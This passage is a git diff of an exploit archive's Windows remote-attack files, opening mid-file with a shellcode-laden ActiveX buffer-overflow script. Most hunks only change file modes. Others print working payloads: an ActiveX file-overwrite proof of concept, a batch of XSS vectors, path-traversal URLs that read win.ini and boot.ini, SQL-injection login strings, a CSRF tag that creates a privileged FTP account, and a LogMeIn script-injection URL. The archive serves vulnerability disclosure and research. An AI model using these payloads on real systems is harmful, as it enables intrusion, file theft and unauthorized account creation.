shellcode=shellcode+unescape("%46%30%55%49%6f%4a%70%50%66%61%7a%31%74%43%56%52") shellcode=shellcode+unescape("%48%75%33%62%4d%6c%49%49%75%71%7a%42%70%50%59%54") shellcode=shellcode+unescape("%69%4a%6c%4c%49%39%77%42%4a%57%34%4b%39%69%72%65") shellcode=shellcode+unescape("%61%4b%70%58%73%6d%7a%6b%4e%50%42%76%4d%6b%4e%50") shellcode=shellcode+unescape("%42%76%4c%4d%43%6e%6d%73%4a%65%68%6e%4b%6e%4b%4c") shellcode=shellcode+unescape("%6b%71%78%32%52%6b%4e%4f%43%34%56%69%6f%72%55%32") shellcode=shellcode+unescape("%64%49%6f%7a%76%43%6b%56%37%56%32%70%51%30%51%32") shellcode=shellcode+unescape("%71%43%5a%37%71%41%41%73%61%63%65%66%31%4b%4f%5a") shellcode=shellcode+unescape("%70%70%68%6e%4d%79%49%73%35%5a%6e%61%43%49%6f%58") shellcode=shellcode+unescape("%56%50%6a%49%6f%59%6f%64%77%59%6f%58%50%4c%4b%32") shellcode=shellcode+unescape("%77%6b%4c%4e%63%48%44%63%54%6b%4f%4e%36%46%32%69") shellcode=shellcode+unescape("%6f%38%50%51%78%78%70%4f%7a%76%64%31%4f%63%63%69") shellcode=shellcode+unescape("%6f%4b%66%6b%4f%68%50%67") NokiaFucker = junk + EIP + nop + shellcode Fucker.SelectDevice NokiaFucker,"" </script> </html> \ No newline at end of file diff --git a/platforms/windows/remote/32826.html b/platforms/windows/remote/32826.html old mode 100755 new mode 100644 index a2c6c025d..defe7ec90 --- a/platforms/windows/remote/32826.html +++ b/platforms/windows/remote/32826.html @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/33942/info iDefense COMRaider ActiveX control is prone to a vulnerability that lets attackers overwrite arbitrary local files on the victim's computer in the context of the vulnerable application using the ActiveX control (typically Internet Explorer). -<HTML> <BODY> <object id=target classid="clsid:{9A077D0D-B4A6-4EC0-B6CF-98526DF589E4}"></object> <SCRIPT> function Poc() { arg1="c:\boo.txt" target.write(arg1) } </SCRIPT> <input language=JavaScript onclick=Poc() type=button value="Proof of Concept"> </BODY> </HTML> \ No newline at end of file +<HTML> <BODY> <object id=target classid="clsid:{9A077D0D-B4A6-4EC0-B6CF-98526DF589E4}"></object> <SCRIPT> function Poc() { arg1="c:\boo.txt" target.write(arg1) } </SCRIPT> <input language=JavaScript onclick=Poc() type=button value="Proof of Concept"> </BODY> </HTML> \ No newline at end of file diff --git a/platforms/windows/remote/32832.c b/platforms/windows/remote/32832.py similarity index 85% rename from platforms/windows/remote/32832.c rename to platforms/windows/remote/32832.py index e7a68e416..aec57d79a 100755 --- a/platforms/windows/remote/32832.c +++ b/platforms/windows/remote/32832.py @@ -1,11 +1,10 @@ -source: http://www.securityfocus.com/bid/33954/info - - -NovaStor NovaNET is prone to a stack-based buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied data before copying it to an insufficiently sized buffer. - -Attackers can exploit this issue to execute arbitrary code within the context of the affected application or cause a denial-of-service condition. - -NovaNET 12 is vulnerable; other versions may also be affected. +#source: http://www.securityfocus.com/bid/33954/info +# +#NovaStor NovaNET is prone to a stack-based buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied data before copying it to an insufficiently sized buffer. +# +#Attackers can exploit this issue to execute arbitrary code within the context of the affected application or cause a denial-of-service condition. +# +#NovaNET 12 is vulnerable; other versions may also be affected. import os import sys diff --git a/platforms/windows/remote/32851.html b/platforms/windows/remote/32851.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/32879.html b/platforms/windows/remote/32879.html old mode 100755 new mode 100644 index 74826449e..a39765c81 --- a/platforms/windows/remote/32879.html +++ b/platforms/windows/remote/32879.html @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br http://example.com:9999/webdbm?Event=DBM_LOGON&Action=VIEW&Server=&Database=[XSS] http://example.com:9999/webdbm?Event=DBM_LOGON&Action=VIEW&Server=&User=[XSS] -http://example.com:9999/webdbm?Event=DBM_LOGON&Action=VIEW&Server=&Database=&User=&Password=[XSS] \ No newline at end of file +http://example.com:9999/webdbm?Event=DBM_LOGON&Action=VIEW&Server=&Database=&User=&Password=[XSS] \ No newline at end of file diff --git a/platforms/windows/remote/32923.cs b/platforms/windows/remote/32923.cs old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/32957.txt b/platforms/windows/remote/32957.txt old mode 100755 new mode 100644 index c922941b0..d0827cebb --- a/platforms/windows/remote/32957.txt +++ b/platforms/windows/remote/32957.txt @@ -9,4 +9,4 @@ DWebPro 6.8.26 is vulnerable; other versions may also be affected. http://www.example.com:8080/..%5C/www/..%5C/www/..%5C/..%5C/..%5C/WINDOWS/ http://www.example.com:8080/..%2f..%2f..%2fWINDOWS%2f http://www.example.com:8080/..\/www/500-100-js.asp::$DATA -http://www.example.com:8080/demos/aspclassic/asp_registry.asp::$DATA \ No newline at end of file +http://www.example.com:8080/demos/aspclassic/asp_registry.asp::$DATA \ No newline at end of file diff --git a/platforms/windows/remote/3296.c b/platforms/windows/remote/3296.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/33024.txt b/platforms/windows/remote/33024.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/33025.txt b/platforms/windows/remote/33025.txt old mode 100755 new mode 100644 index 64a8776ab..a7c703e14 --- a/platforms/windows/remote/33025.txt +++ b/platforms/windows/remote/33025.txt @@ -8,4 +8,4 @@ LogMeIn 4.0.784 is vulnerable; other versions may also be affected. The following example URI is available: http://securethoughts.com/2009/06/multiple-vulnerabilities-in-logmein-web-interface-can-be-used-to-control-your-computer-and-steal-arbitary-files/#viewSource -http://www.example.com/cfgadvanced.html?op=update&DisconnectExisting=1&NoHttpCompr=1&CrashDumpInfo=0&lang=en-US%0D%0A%0D%0A%3Chtml%3E%3Cbody%3E%3C/body%3E%3CSCRIPT%3Evar%20ifr%3Dnull%3Bfunction%20al%28%29%7Bvar%20str%3D%28window.frames%5B0%5D.document.body.innerHTML%20%7C%7C%20ifr.contentDocument.documentElement.innerHTML%29%3Balert%28str.substring%28%28str.toLowerCase%28%29%29.indexOf%28%22%3Clegend%3E%22%2C400%29%29%29%3B%7D%20if%28window.location.href.match%28/.*cfgad.*/%29%29%7Bifr%3Ddocument.createElement%28%22iframe%22%29%3Bifr.src%3D%22https%3A//localhost%3A2002/logs.html%3Flog%3D../../../windows/win.ini%22%3Bdocument.body.appendChild%28ifr%29%3BsetTimeout%28%22al%28%29%22%2C4000%29%3B%7D%3C/script%3E%3C%21-- \ No newline at end of file +http://www.example.com/cfgadvanced.html?op=update&DisconnectExisting=1&NoHttpCompr=1&CrashDumpInfo=0&lang=en-US%0D%0A%0D%0A%3Chtml%3E%3Cbody%3E%3C/body%3E%3CSCRIPT%3Evar%20ifr%3Dnull%3Bfunction%20al%28%29%7Bvar%20str%3D%28window.frames%5B0%5D.document.body.innerHTML%20%7C%7C%20ifr.contentDocument.documentElement.innerHTML%29%3Balert%28str.substring%28%28str.toLowerCase%28%29%29.indexOf%28%22%3Clegend%3E%22%2C400%29%29%29%3B%7D%20if%28window.location.href.match%28/.*cfgad.*/%29%29%7Bifr%3Ddocument.createElement%28%22iframe%22%29%3Bifr.src%3D%22https%3A//localhost%3A2002/logs.html%3Flog%3D../../../windows/win.ini%22%3Bdocument.body.appendChild%28ifr%29%3BsetTimeout%28%22al%28%29%22%2C4000%29%3B%7D%3C/script%3E%3C%21-- \ No newline at end of file diff --git a/platforms/windows/remote/33027.py b/platforms/windows/remote/33027.py index d047dc842..f192d0a4a 100755 --- a/platforms/windows/remote/33027.py +++ b/platforms/windows/remote/33027.py @@ -74,4 +74,4 @@ try: print "[-] Connection lost from " + host + ":4444 \r" except: print "[-] Could not connect to " + host + ":4444\r" - sys.exit(0) \ No newline at end of file + sys.exit(0) \ No newline at end of file diff --git a/platforms/windows/remote/33035.txt b/platforms/windows/remote/33035.txt old mode 100755 new mode 100644 index 001b763d4..e970c87d5 --- a/platforms/windows/remote/33035.txt +++ b/platforms/windows/remote/33035.txt @@ -13,4 +13,4 @@ An attacker can exploit these vulnerabilities to obtain information that may aid The following command may be used to discover hosts: -file://\\<IP>\c$\a.mp3 \ No newline at end of file +file://\\<IP>\c$\a.mp3 \ No newline at end of file diff --git a/platforms/windows/remote/33050.html b/platforms/windows/remote/33050.html old mode 100755 new mode 100644 index 021ced477..af4850714 --- a/platforms/windows/remote/33050.html +++ b/platforms/windows/remote/33050.html @@ -4,4 +4,4 @@ Microsoft Internet Explorer is prone to a security-bypass vulnerability because An attacker may exploit this issue to bypass restrictions on the execution of JavaScript code. This may aid in further attacks. -<STYLE>@import 'javascript:alert("xss1")';</STYLE> <IMG SRC=javascript:alert('XSS2')> <BODY BACKGROUND="javascript:alert('XSS3')"> <LINK REL="stylesheet" HREF="javascript:alert('XSS4');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS5');"> <IFRAME SRC="javascript:alert('XSS6');"></IFRAME> <DIV STYLE="background-image: url(javascript:alert('XSS7'))"> <STYLE>.XSS{background-image:url("javascript:alert('XSS8')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS9')")}</STYLE> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS10')></OBJECT> <STYLE>@import'http://example.com/xss.css';</STYLE> <script SRC="javascript:alert('xss11');"></script> <video SRC="javascript:alert('xss12');"</video> <LAYER SRC="javascript:alert('xss13')"></LAYER> <embed src="javascript:alert('xss14')" type="application/x-shockwave-flash" allowscriptaccess="always" width="0" height="0"></embed> <applet src="javascript:alert('xss15')" type=text/html> \ No newline at end of file +<STYLE>@import 'javascript:alert("xss1")';</STYLE> <IMG SRC=javascript:alert('XSS2')> <BODY BACKGROUND="javascript:alert('XSS3')"> <LINK REL="stylesheet" HREF="javascript:alert('XSS4');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS5');"> <IFRAME SRC="javascript:alert('XSS6');"></IFRAME> <DIV STYLE="background-image: url(javascript:alert('XSS7'))"> <STYLE>.XSS{background-image:url("javascript:alert('XSS8')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS9')")}</STYLE> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS10')></OBJECT> <STYLE>@import'http://example.com/xss.css';</STYLE> <script SRC="javascript:alert('xss11');"></script> <video SRC="javascript:alert('xss12');"</video> <LAYER SRC="javascript:alert('xss13')"></LAYER> <embed src="javascript:alert('xss14')" type="application/x-shockwave-flash" allowscriptaccess="always" width="0" height="0"></embed> <applet src="javascript:alert('xss15')" type=text/html> \ No newline at end of file diff --git a/platforms/windows/remote/33063.txt b/platforms/windows/remote/33063.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/33066.html b/platforms/windows/remote/33066.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/33071.txt b/platforms/windows/remote/33071.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/33172.txt b/platforms/windows/remote/33172.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/33207.txt b/platforms/windows/remote/33207.txt old mode 100755 new mode 100644 index 5c0260285..8e049d8c0 --- a/platforms/windows/remote/33207.txt +++ b/platforms/windows/remote/33207.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary code in the context of t SmartVMD 1.3 is vulnerable; other versions may also be affected. -<object classid='clsid:E3462D53-47A6-11D8-8EF6-DAE89272743C' id='test'></object> <input language=VBScript onclick=aidi() type=button value='test'> <script language='vbscript'> Sub aidi buff = String (9000, "a") test.StartVideoSaving (buff) End Sub </script> \ No newline at end of file +<object classid='clsid:E3462D53-47A6-11D8-8EF6-DAE89272743C' id='test'></object> <input language=VBScript onclick=aidi() type=button value='test'> <script language='vbscript'> Sub aidi buff = String (9000, "a") test.StartVideoSaving (buff) End Sub </script> \ No newline at end of file diff --git a/platforms/windows/remote/33263.html b/platforms/windows/remote/33263.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/33264.txt b/platforms/windows/remote/33264.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/33270.txt b/platforms/windows/remote/33270.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/33272.txt b/platforms/windows/remote/33272.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/33273.scn b/platforms/windows/remote/33273.scn old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3335.pm b/platforms/windows/remote/3335.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3340.html b/platforms/windows/remote/3340.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/33431.html b/platforms/windows/remote/33431.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/33432.html b/platforms/windows/remote/33432.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/33433.html b/platforms/windows/remote/33433.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/33501.txt b/platforms/windows/remote/33501.txt old mode 100755 new mode 100644 index 197739c5a..60c67e61f --- a/platforms/windows/remote/33501.txt +++ b/platforms/windows/remote/33501.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to execute arbitrary commands in a terminal. Cherokee 0.99.30 and prior are vulnerable. -curl -kis http://www.example.com/%1b%5d%32%3b%6f%77%6e%65%64%07%0a \ No newline at end of file +curl -kis http://www.example.com/%1b%5d%32%3b%6f%77%6e%65%64%07%0a \ No newline at end of file diff --git a/platforms/windows/remote/33502.txt b/platforms/windows/remote/33502.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/33540.txt b/platforms/windows/remote/33540.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/33552.txt b/platforms/windows/remote/33552.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/33563.txt b/platforms/windows/remote/33563.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/33594.txt b/platforms/windows/remote/33594.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/33611.txt b/platforms/windows/remote/33611.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/33642.html b/platforms/windows/remote/33642.html old mode 100755 new mode 100644 index 606803a24..2932fb155 --- a/platforms/windows/remote/33642.html +++ b/platforms/windows/remote/33642.html @@ -10,4 +10,4 @@ Symantec AntiVirus 10.0.x and 10.1.x prior to 10.1 MR9 Symantec AntiVirus 10.2.x prior to 10.2 MR4 Symantec Client Security 3.0.x and 3.1.x prior to 3.1 MR9 -<html> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:E381F1C0-910E-11D1-AB1E-00A0C90F8F6F' id='target' /> <script language='vbscript'> arg1=String(7188, "A") target.SetRemoteComputerName arg1 </script> </html> \ No newline at end of file +<html> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:E381F1C0-910E-11D1-AB1E-00A0C90F8F6F' id='target' /> <script language='vbscript'> arg1=String(7188, "A") target.SetRemoteComputerName arg1 </script> </html> \ No newline at end of file diff --git a/platforms/windows/remote/33662.txt b/platforms/windows/remote/33662.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/33705.txt b/platforms/windows/remote/33705.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/33712.txt b/platforms/windows/remote/33712.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/33750.txt b/platforms/windows/remote/33750.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3380.txt b/platforms/windows/remote/3380.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/33829.c b/platforms/windows/remote/33829.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/33841.txt b/platforms/windows/remote/33841.txt old mode 100755 new mode 100644 index 13b1b852a..315c6dfd7 --- a/platforms/windows/remote/33841.txt +++ b/platforms/windows/remote/33841.txt @@ -5,4 +5,4 @@ HTTP File Server is prone to multiple vulnerabilities including a security-bypas Exploiting these issues will allow an attacker to download files from restricted directories within the context of the application or cause denial-of-service conditions. http://www.example.com/protected_folder/secret_file.txt%00 -http://www.example.com/?search=%25%25 \ No newline at end of file +http://www.example.com/?search=%25%25 \ No newline at end of file diff --git a/platforms/windows/remote/33852.txt b/platforms/windows/remote/33852.txt old mode 100755 new mode 100644 index 3b3331563..2e8c32d0b --- a/platforms/windows/remote/33852.txt +++ b/platforms/windows/remote/33852.txt @@ -6,4 +6,4 @@ Exploiting this issue will allow an attacker to view arbitrary local files and d HTTP 1.1 is vulnerable; other versions may also be affected. -GET /..\..\\..\..\\..\..\\..\..\\\boot.ini HTTP/1.0 \ No newline at end of file +GET /..\..\\..\..\\..\..\\..\..\\\boot.ini HTTP/1.0 \ No newline at end of file diff --git a/platforms/windows/remote/33890.txt b/platforms/windows/remote/33890.txt old mode 100755 new mode 100644 index 83631cc1b..057bba837 --- a/platforms/windows/remote/33890.txt +++ b/platforms/windows/remote/33890.txt @@ -6,4 +6,4 @@ Exploiting the issue may allow an attacker to obtain sensitive information that OneHTTPD 0.6 is vulnerable; other versions may also be affected. -http://www.example.com/%C2../%C2../%C2../%C2../%C2../%C2../%C2../%C2../ \ No newline at end of file +http://www.example.com/%C2../%C2../%C2../%C2../%C2../%C2../%C2../%C2../ \ No newline at end of file diff --git a/platforms/windows/remote/33935.txt b/platforms/windows/remote/33935.txt old mode 100755 new mode 100644 index 037d75c44..2520551c3 --- a/platforms/windows/remote/33935.txt +++ b/platforms/windows/remote/33935.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to gain administrative rights to the rbot 0.9.14 is vulnerable; other versions may also be affected. -<attacker> !react to /attacker:.*/ with cmd:whoami \ No newline at end of file +<attacker> !react to /attacker:.*/ with cmd:whoami \ No newline at end of file diff --git a/platforms/windows/remote/33941.html b/platforms/windows/remote/33941.html old mode 100755 new mode 100644 index b21a61b3b..e725b559d --- a/platforms/windows/remote/33941.html +++ b/platforms/windows/remote/33941.html @@ -4,4 +4,4 @@ TVUPlayer ActiveX control is prone to a vulnerability that lets attackers overwr TVUPlayer 2.4.9beta1 [build1797] is vulnerable; other versions may be affected. -<?XML version='1.0' standalone='yes' ?> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:18E6ED0D-08D1-4ED5-8771-E72B4E6EFFD8' id='target' /> <script language='vbscript'> 'File Generated by COMRaider v0.0.133 - http://labs.idefense.com 'Wscript.echo typename(target) 'for debugging/custom prolog targetFile = "C:\Program Files\Online TV Player 4\PlayerOcx.ocx" prototype = "Property Let LangFileName As String" memberName = "LangFileName" progid = "PlayerOcx.FormPlayer" argCount = 1 arg1="C:\WINDOWS\system32\drivers\etc\hosts" target.LangFileName = arg1 </script></job></package> \ No newline at end of file +<?XML version='1.0' standalone='yes' ?> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:18E6ED0D-08D1-4ED5-8771-E72B4E6EFFD8' id='target' /> <script language='vbscript'> 'File Generated by COMRaider v0.0.133 - http://labs.idefense.com 'Wscript.echo typename(target) 'for debugging/custom prolog targetFile = "C:\Program Files\Online TV Player 4\PlayerOcx.ocx" prototype = "Property Let LangFileName As String" memberName = "LangFileName" progid = "PlayerOcx.FormPlayer" argCount = 1 arg1="C:\WINDOWS\system32\drivers\etc\hosts" target.LangFileName = arg1 </script></job></package> \ No newline at end of file diff --git a/platforms/windows/remote/33944.html b/platforms/windows/remote/33944.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3395.c b/platforms/windows/remote/3395.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/33964.txt b/platforms/windows/remote/33964.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/33971.c b/platforms/windows/remote/33971.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/33974.txt b/platforms/windows/remote/33974.txt old mode 100755 new mode 100644 index ac32eaad9..e9391150d --- a/platforms/windows/remote/33974.txt +++ b/platforms/windows/remote/33974.txt @@ -6,4 +6,4 @@ Exploiting this issue will allow an attacker to view arbitrary local files and d Mereo 1.9.1 is vulnerable; other versions may also be affected. -http://www.example.com/%80../%80../%80../%80../%80../%80../%80../%80../ \ No newline at end of file +http://www.example.com/%80../%80../%80../%80../%80../%80../%80../%80../ \ No newline at end of file diff --git a/platforms/windows/remote/33980.txt b/platforms/windows/remote/33980.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/33981.txt b/platforms/windows/remote/33981.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/34002.c b/platforms/windows/remote/34002.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/34013.txt b/platforms/windows/remote/34013.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/34047.html b/platforms/windows/remote/34047.html old mode 100755 new mode 100644 index 35a7cd47a..2382f83e1 --- a/platforms/windows/remote/34047.html +++ b/platforms/windows/remote/34047.html @@ -6,4 +6,4 @@ Exploiting this issue may allow a remote attacker to perform certain administrat Home FTP Server 1.10.3 (build 144) is vulnerable; other versions may be affected. -<html> <body> <img src="http://www.example.com/?addnewmember=new_user&pass=Password1&home=c:\&allowdownload=on&allowupload=on&allowrename=on&allowdeletefile=on&allowchangedir=on&allowcreatedir=on&allowdeletedir=on&virtualdir=&filecontrol=" /> </body> </html> \ No newline at end of file +<html> <body> <img src="http://www.example.com/?addnewmember=new_user&pass=Password1&home=c:\&allowdownload=on&allowupload=on&allowrename=on&allowdeletefile=on&allowchangedir=on&allowcreatedir=on&allowdeletedir=on&virtualdir=&filecontrol=" /> </body> </html> \ No newline at end of file diff --git a/platforms/windows/remote/34115.txt b/platforms/windows/remote/34115.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/34126.txt b/platforms/windows/remote/34126.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/34143.txt b/platforms/windows/remote/34143.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/34174.txt b/platforms/windows/remote/34174.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/34178.txt b/platforms/windows/remote/34178.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3420.html b/platforms/windows/remote/3420.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/34230.txt b/platforms/windows/remote/34230.txt old mode 100755 new mode 100644 index 5d5f11d3f..c296d8c31 --- a/platforms/windows/remote/34230.txt +++ b/platforms/windows/remote/34230.txt @@ -8,4 +8,4 @@ Exploiting these issues could allow an attacker to compromise the application, a The following example data are available: user: ' or ' 1=1 -pass: ' or ' 1=1 \ No newline at end of file +pass: ' or ' 1=1 \ No newline at end of file diff --git a/platforms/windows/remote/34437.txt b/platforms/windows/remote/34437.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/34462.txt b/platforms/windows/remote/34462.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/34478.html b/platforms/windows/remote/34478.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/34532.c b/platforms/windows/remote/34532.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/34542.c b/platforms/windows/remote/34542.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3462.cpp b/platforms/windows/remote/3462.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/34622.txt b/platforms/windows/remote/34622.txt old mode 100755 new mode 100644 index 03377ffca..bcf1d2f58 --- a/platforms/windows/remote/34622.txt +++ b/platforms/windows/remote/34622.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an attacker to obtain sensitive information that Axigen Webmail 7.4.1 is vulnerable; other versions may be affected. -http://www.example.com/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini \ No newline at end of file +http://www.example.com/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini \ No newline at end of file diff --git a/platforms/windows/remote/3463.cpp b/platforms/windows/remote/3463.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/34647.txt b/platforms/windows/remote/34647.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/34654.c b/platforms/windows/remote/34654.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/34668.txt b/platforms/windows/remote/34668.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/34686.txt b/platforms/windows/remote/34686.txt old mode 100755 new mode 100644 index 914428562..3f4e6a0c4 --- a/platforms/windows/remote/34686.txt +++ b/platforms/windows/remote/34686.txt @@ -6,4 +6,4 @@ Exploiting this issue will allow an attacker to read files outside the webroot d Pinky 1.0 is vulnerable; other versions may also be affected. -http://www.example.com/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini \ No newline at end of file +http://www.example.com/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini \ No newline at end of file diff --git a/platforms/windows/remote/34695.c b/platforms/windows/remote/34695.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/34696.c b/platforms/windows/remote/34696.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/34697.c b/platforms/windows/remote/34697.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/34768.c b/platforms/windows/remote/34768.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/34815.html b/platforms/windows/remote/34815.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/34821.txt b/platforms/windows/remote/34821.txt old mode 100755 new mode 100644 index 6cdd6254b..9b9978841 --- a/platforms/windows/remote/34821.txt +++ b/platforms/windows/remote/34821.txt @@ -6,4 +6,4 @@ Attackers can overwrite arbitrary files on the victim's computer in the context InstallShield 2009 Premier 15.0.0.53 is vulnerable; other versions may also be affected. -# Part Expl0it & Bug Codes ( Poc ) : ------------------------------------ <b> Installshiled 2009 premier 15.0.0.53 File Overwrite Expl0it <b/> by : the_Edit0r <b/> <b/> <object classid='clsid:34E7A6F9-F260-46BD-AAC8-1E70E22139D2' id='Edit0r'></object> <script> try{ var obj = document.InsertCustomAction('Edit0r'); obj.AddPage(1); obj.SaveToFile("C:/system_.ini"); window.alert('check C:'); } catch(err){ window.alert('Poc failed'); } </script> \ No newline at end of file +# Part Expl0it & Bug Codes ( Poc ) : ------------------------------------ <b> Installshiled 2009 premier 15.0.0.53 File Overwrite Expl0it <b/> by : the_Edit0r <b/> <b/> <object classid='clsid:34E7A6F9-F260-46BD-AAC8-1E70E22139D2' id='Edit0r'></object> <script> try{ var obj = document.InsertCustomAction('Edit0r'); obj.AddPage(1); obj.SaveToFile("C:/system_.ini"); window.alert('check C:'); } catch(err){ window.alert('Poc failed'); } </script> \ No newline at end of file diff --git a/platforms/windows/remote/34823.c b/platforms/windows/remote/34823.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/34829.c b/platforms/windows/remote/34829.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/34830.c b/platforms/windows/remote/34830.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/34831.c b/platforms/windows/remote/34831.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/34832.c b/platforms/windows/remote/34832.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/34838.c b/platforms/windows/remote/34838.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/34844.c b/platforms/windows/remote/34844.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/34846.txt b/platforms/windows/remote/34846.txt old mode 100755 new mode 100644 index 8c1a6f0ef..404a3510f --- a/platforms/windows/remote/34846.txt +++ b/platforms/windows/remote/34846.txt @@ -10,4 +10,4 @@ The following example URI are available: http://www.example.com/index.html. http://www.example.com/test.py. -http://www.example.com/test.php. \ No newline at end of file +http://www.example.com/test.php. \ No newline at end of file diff --git a/platforms/windows/remote/34848.c b/platforms/windows/remote/34848.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/34853.c b/platforms/windows/remote/34853.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/34868.c b/platforms/windows/remote/34868.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/34869.c b/platforms/windows/remote/34869.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/34870.html b/platforms/windows/remote/34870.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/34931.c b/platforms/windows/remote/34931.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/34943.txt b/platforms/windows/remote/34943.txt old mode 100755 new mode 100644 index 61209dd05..b08d7562e --- a/platforms/windows/remote/34943.txt +++ b/platforms/windows/remote/34943.txt @@ -6,4 +6,4 @@ Exploiting this issue will allow an attacker to read files outside the webroot d Project Jug 1.0.0.0 is vulnerable; other versions may also be affected. -http://www.example.com/.../.../.../.../.../.../.../.../.../.../windows/win.ini \ No newline at end of file +http://www.example.com/.../.../.../.../.../.../.../.../.../.../windows/win.ini \ No newline at end of file diff --git a/platforms/windows/remote/3495.txt b/platforms/windows/remote/3495.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/34978.c b/platforms/windows/remote/34978.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/34997.txt b/platforms/windows/remote/34997.txt old mode 100755 new mode 100644 index f944c842e..47f34408b --- a/platforms/windows/remote/34997.txt +++ b/platforms/windows/remote/34997.txt @@ -4,4 +4,4 @@ DServe is prone to multiple cross-site scripting vulnerabilities because it fail An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. 